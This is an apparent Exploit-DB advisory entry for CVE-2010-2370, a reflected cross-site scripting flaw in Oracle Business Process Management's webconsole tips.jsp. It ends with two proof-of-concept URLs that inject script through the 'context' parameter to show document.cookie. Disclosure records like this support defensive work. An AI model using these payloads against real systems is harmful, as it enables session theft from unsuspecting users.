Oracle Business Process Management <= 10.3.2 - Cross-Site Scripting Vulnerability

2010-07-13T00:00:00
ID EDB-ID:34310
Type exploitdb
Reporter Markot
Modified 2010-07-13T00:00:00

Description

Oracle Business Process Management 10.3.2 Cross Site Scripting Vulnerability. CVE-2010-2370. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/41617/info

Oracle Business Process Management is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

This vulnerability affects the following supported versions:
5.7 MP3, 6.0 MP5, 10.3 MP2

http://www.example.com:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert(document.cookie)</script>
http://www.example.com:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert('CorelanTeam')</script>